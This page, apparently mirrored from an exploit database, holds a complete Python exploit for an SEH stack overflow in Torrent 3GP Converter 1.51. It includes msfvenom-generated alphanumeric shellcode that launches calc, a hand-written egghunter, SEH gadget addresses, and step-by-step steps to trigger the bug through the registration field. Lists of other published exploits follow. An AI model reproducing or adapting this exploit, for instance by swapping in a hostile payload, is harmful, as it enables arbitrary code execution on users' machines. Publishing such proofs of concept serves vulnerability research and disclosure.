Search for hundreds of thousands of exploits

"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)"

Author

Exploit author

boku

Platform

Exploit platform

windows

Release date

Exploit published date

2020-01-27

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
# Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow (SEH)
# Exploit Author: boku
# Date: 2020-01-24
# Software Vendor: torrentrockyou
# Vendor Homepage: http://www.torrentrockyou.com
# Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe
# Version: Torrent 3GP Converter Version 1.51 Build 116
# Tested On: Windows 10 Home (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Education (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Recreate:
#  1) Download, install, and open Torrent 3GP Converter 1.51 Build 116 for windows x86
#  2) run python script & open created 'crash.txt' file
#  3) select-all > copy-all
#  4) in app, click 'Register' on the bottom
#  5) in 'Name:' textbox enter 'a'
#  6) in 'Code:' textbox paste buffer
#  7) click 'OK', calculator will open & app will crash

#!/usr/bin/python

# Bad Chars 
# \x00 => \x20 # \x0d Truncates buffer # \x2d Gets ejected from buffer
# \x61-\x6f => \x41-\x4f / ASCII Lower => ASCII Upper
# \x70-\x7a => \x50-\x5a / ASCII Lower => ASCII Upper
# \x9a => \x8a # \x9c => \x8c # \x9e => \x8e
# \xe0-\xef => \xc0-\xcf # \xf0-\xf6 => \xd0-\xd6
# \xf8-\xfe => \xd8-\xde # \xff => \x9f
# badChars='\x00\x0d\x2d\x61\x62\x63\64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x9a\x9c\x9e\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xee\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
# Max shellcode size is 2384  bytes
# - First 2384 bytes of our buffer is left unmangled on the stack
# msfvenom -p windows/exec CMD='calc' -e x86/alpha_upper --format python -v shellcode
# x86/alpha_upper chosen with final size 447
# Payload size: 447 bytes
## msfvenom x86/alpha_uppers GetPC Routine ##
#  [!] Does not work because of the bad chars!
# Manually replaced with a working version of GetPC for this exploit
# 89E5            mov ebp, esp
shellcode = b'\x54\x5D' # push esp # pop ebp
# DBCD            fcmovne st, st(5)
shellcode += b'\x89\xCF' # mov edi, ecx
# D975 F4         fstenv [ebp-C]
shellcode += b'\x47\x47\x90' # inc edi # inc edi # nop
# 5F              pop edi  
shellcode += b'\x90' # nop
shellcode += b"\x57\x59\x49"
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x55\x50\x55\x50"
shellcode += b"\x33\x30\x43\x50\x4b\x39\x4b\x55\x46\x51\x59"
shellcode += b"\x50\x42\x44\x4c\x4b\x30\x50\x36\x50\x4c\x4b"
shellcode += b"\x56\x32\x34\x4c\x4c\x4b\x56\x32\x42\x34\x4c"
shellcode += b"\x4b\x34\x32\x31\x38\x34\x4f\x4e\x57\x50\x4a"
shellcode += b"\x37\x56\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x35"
shellcode += b"\x31\x43\x4c\x34\x42\x56\x4c\x47\x50\x39\x51"
shellcode += b"\x58\x4f\x34\x4d\x45\x51\x59\x57\x4a\x42\x4a"
shellcode += b"\x52\x46\x32\x56\x37\x4c\x4b\x31\x42\x44\x50"
shellcode += b"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x50\x4c\x42"
shellcode += b"\x31\x33\x48\x4b\x53\x51\x58\x45\x51\x4e\x31"
shellcode += b"\x30\x51\x4c\x4b\x31\x49\x51\x30\x55\x51\x59"
shellcode += b"\x43\x4c\x4b\x30\x49\x42\x38\x4b\x53\x37\x4a"
shellcode += b"\x57\x39\x4c\x4b\x47\x44\x4c\x4b\x53\x31\x59"
shellcode += b"\x46\x46\x51\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x34\x4d\x35\x51\x4f\x37\x57\x48\x4d\x30\x53"
shellcode += b"\x45\x4c\x36\x45\x53\x53\x4d\x4a\x58\x37\x4b"
shellcode += b"\x43\x4d\x46\x44\x33\x45\x4a\x44\x56\x38\x4c"
shellcode += b"\x4b\x36\x38\x47\x54\x45\x51\x38\x53\x32\x46"
shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x50\x58\x45"
shellcode += b"\x4c\x53\x31\x59\x43\x4c\x4b\x45\x54\x4c\x4b"
shellcode += b"\x33\x31\x38\x50\x4d\x59\x57\x34\x57\x54\x36"
shellcode += b"\x44\x31\x4b\x51\x4b\x33\x51\x36\x39\x31\x4a"
shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x50"
shellcode += b"\x5a\x4c\x4b\x45\x42\x5a\x4b\x4c\x4d\x51\x4d"
shellcode += b"\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x48\x32\x35"
shellcode += b"\x50\x43\x30\x33\x30\x46\x30\x43\x58\x46\x51"
shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f"
shellcode += b"\x4b\x5a\x50\x38\x35\x39\x32\x31\x46\x53\x58"
shellcode += b"\x4e\x46\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58"
shellcode += b"\x55\x47\x4c\x35\x56\x43\x4c\x35\x5a\x4b\x30"
shellcode += b"\x4b\x4b\x4d\x30\x42\x55\x44\x45\x4f\x4b\x37"
shellcode += b"\x37\x45\x43\x54\x32\x32\x4f\x42\x4a\x55\x50"
shellcode += b"\x36\x33\x4b\x4f\x58\x55\x45\x33\x55\x31\x32"
shellcode += b"\x4c\x43\x53\x35\x50\x41\x41"
# Stack EggHunter for fun & profit 
egg = 'BOKU'
hunterOS = '\x41'*(2784-len(egg+egg+shellcode))
# After executing the code in nSEH, we are left with 88 bytes to create our Hunter
hunter  = '\x4C'*4 # dec esp * 4 / avoid sub bad char / topOfStack=GetPC
hunter  += '\x5B' # pop ebx / EBX=PC
hunter  += '\x80\x43\x29\x20'     #   add byte [ebx+41], 0x20 / 20+55=7F=jnz
hunter  += '\x80\x43\x33\x20'     #   add byte [ebx+51], 0x20 / 20+55=7F=jnz
hunter  += '\xB8\x42\x4F\x4B\x55' # mov eax,0x424f4b55
hunter  += '\x54' # push esp
hunter  += '\x59' # pop ecx
hunter  += '\x90'*18 # nop fillers for jnz short -7 loop
hunter  += '\x49' # dec ecx
hunter  += '\x3B\x01' # cmp eax, [ecx]
hunter  += '\x55\xF7' # 75F7 = jnz short -7 / Have to avoid bad \xF- chars
hunter  += '\x51' # push ecx
hunter  += '\x5a' # pop edx
hunter  += '\x4a'*4 # dec edx * 4 / check if second egg matchs
hunter  += '\x3B\x02' # cmp eax, [edx]
hunter  += '\x55\xDF' # jnz short -31 / back to the loop - avoid bad chars
hunter  += '\x83\xc1\04' # add ecx, 0x4 / start of shellcode after eggs
hunter  += '\x31\xd2' # xor edx,edx
hunter  += '\x52' # push edx
hunter  += '\xC6\x44\x24\x02\x4B' # mov byte [esp+0x2],0x4b
hunter  += '\xC6\x44\x24\x01\x44' # mov byte [esp+0x1],0x44
hunter  += '\xC6\x04\x24\x39'     # mov byte [esp],0x39
# [ESP]=0x004b4439 : call ecx | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe]
#   ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent 3GP Converter\bsvideoconverter.exe)
hunter  += '\xc3' # ret
huntRmdr = '\x41'*(88-len(hunter))
nsehOS   = '\x90'*(4500-len(egg+egg+shellcode+hunterOS+hunter+huntRmdr))
nSEH     = '\x83\xC4\x04\xC3'     # add esp,byte +0x4 # ret
# 3-byte SEH overwrite using the truncating Null byte
SEH      = '\x0f\x47\x4c' # 0x004c470f : pop esi # pop ebx # ret [bsvideoconverter.exe] 
         # ASLR: False, Rebase: False, SafeSEH: False {PAGE_EXECUTE_READWRITE} 

payload  = egg+egg+shellcode+hunterOS+hunter+huntRmdr+nsehOS+nSEH+SEH

try:
    f=open("crash.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
Release DateTitleTypePlatformAuthor
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
Release DateTitleTypePlatformAuthor
2020-05-26"StreamRipper32 2.6 - Buffer Overflow (PoC)"localwindows"Andy Bowden"
2020-05-25"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)"remotewindowsMetasploit
2020-05-25"GoldWave - Buffer Overflow (SEH Unicode)"localwindows"Andy Bowden"
2020-05-22"Filetto 1.0 - 'FEAT' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)"localwindowsGobinathan
2020-05-22"Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation"localwindows"Matteo Malvica"
2020-05-22"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-21"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)"localwindows"Xenofon Vassilakopoulos"
2020-05-21"AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)"doswindows"Xenofon Vassilakopoulos"
Release DateTitleTypePlatformAuthor
2020-05-22"Gym Management System 1.0 - Unauthenticated Remote Code Execution"webappsphpboku
2020-05-07"Pisay Online E-Learning System 1.0 - Remote Code Execution"webappsphpboku
2020-05-01"ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting"webappsphpboku
2020-05-01"Online Scheduling System 1.0 - Authentication Bypass"webappsphpboku
2020-05-01"Online Scheduling System 1.0 - Persistent Cross-Site Scripting"webappsphpboku
2020-04-20"Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)"localwindowsboku
2020-04-20"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path"localwindowsboku
2020-04-13"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)"localwindowsboku
2020-02-17"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"Cuckoo Clock v5.0 - Buffer Overflow"localwindowsboku
2020-02-17"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path"localwindowsboku
2020-02-17"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-11"Disk Savvy Enterprise 12.3.18 - Unquoted Service Path"localwindowsboku
2020-02-11"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path"localwindowsboku
2020-02-11"Torrent iPod Video Converter 1.51 - Stack Overflow"localwindowsboku
2020-02-11"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path"localwindowsboku
2020-02-11"Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path"localwindowsboku
2020-01-27"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)"localwindowsboku
2020-01-23"BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)"doswindowsboku
2019-12-30"AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)"localwindowsboku
2019-12-30"Domain Quester Pro 6.02 - Stack Overflow (SEH)"localwindowsboku
2019-12-30"FTP Navigator 8.03 - Stack Overflow (SEH)"localwindowsboku
2019-12-13"FTP Commander Pro 8.03 - Local Stack Overflow"localwindowsboku
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47965/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.